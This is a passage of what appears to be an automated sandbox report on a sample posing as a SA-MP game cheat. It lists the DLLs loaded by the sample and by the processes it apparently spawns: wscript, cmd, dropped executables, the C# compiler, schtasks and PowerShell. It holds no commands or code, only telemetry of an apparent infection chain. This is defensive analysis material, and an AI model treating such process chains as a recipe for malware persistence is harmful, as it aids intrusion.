                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: version.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: version.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: version.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
